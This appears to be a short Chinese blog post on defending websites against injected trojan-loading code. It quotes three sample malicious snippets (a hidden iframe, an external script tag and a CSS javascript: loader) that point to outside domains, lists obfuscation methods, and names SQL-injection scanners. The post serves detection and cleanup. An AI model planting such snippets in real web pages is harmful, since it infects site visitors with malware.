拒绝挂"马"的网页

---

一:个人(商业)网站限制:

---

*服务器的安全:首先是取决ISP提供商和虚拟主机的自己的安全水平,服务器安全指补丁更新,系统设置,放火墙设置,IIS安全设置,杀毒软件设置等.

*网站程序安全:程序 Bug,第三方程序,等漏洞.

*维护安全:主要是程序交付并正式运行以后,网站要单独维护人员进行维护.在这里比如密码被泄露.

---

二:网站被窃的后果

---

会获取注册用户的Email等个人信息,还有可能获得有价值的商业信息.

---

三:什么是网站挂"马"

---

入侵者利用系统漏洞通过一些程序生成脚本文件或者在网页,嵌入到网页中,当有用户访问时候木马程序会不知不觉的下载到你访问者 的计算机中被偷偷的执行.

---

四:"四点"打造安全网站

---

1"看"
主要是观察网页执行时候是否有新的代码执行:如以下三中
<ifrme src="http://www.12cnhr.com/inc/about.asp" width="0" height="0" frameborder="0"></iframe>
<script src="http://www.bdcrb.com/QQ/1.js"></sciprt>
body{
background-imge:url('javascript:document.write("<scirpt src=http://www.9xiao.net.9xiao.js></scirpt>")')
}
有这写类似的代码,那你要小心哦,但还有一些高手会将原程序加密;
加密方法有以下9种:
(1):Unicode码的转码实现加密;
(2):带密匙的加密;
(3):Base64加密;
(4):md5加密;
(5):微软的Encode加密;
(6):8进制和16进制转义字符加密;
(7):10进制和16进制HTML编码加密;
(8):escape()方法加密;
(9):js脚本加密码;

2"查"
通过使用工具来查找网页中像上面的代码;

3"删除"

通过将有问题的页面代码下来,提交杀毒软件公司干掉它;但你在客户端发现问题代码时候,那说明在服务端已经到无法控制的地步哦,所以你就只用
先在服务端杀毒并重新上才传一次你的站点.

4"堵"

能将代码上传,那一定代表网站有漏洞,所以可以使用工具来检测和分析,使用Domain3.5或者是HDSI等SQL注入软件检测漏洞,更换数据库管理密码,更换服务器用户名和密码,
还有就是一定要认真的检测你服务器上的系统的安全,还有查看系统日志,进程,服务器,系统文件.发现系统本身的问题提高防御能力;


我的能力就能谈到这里

---------------------------------------works guo----------------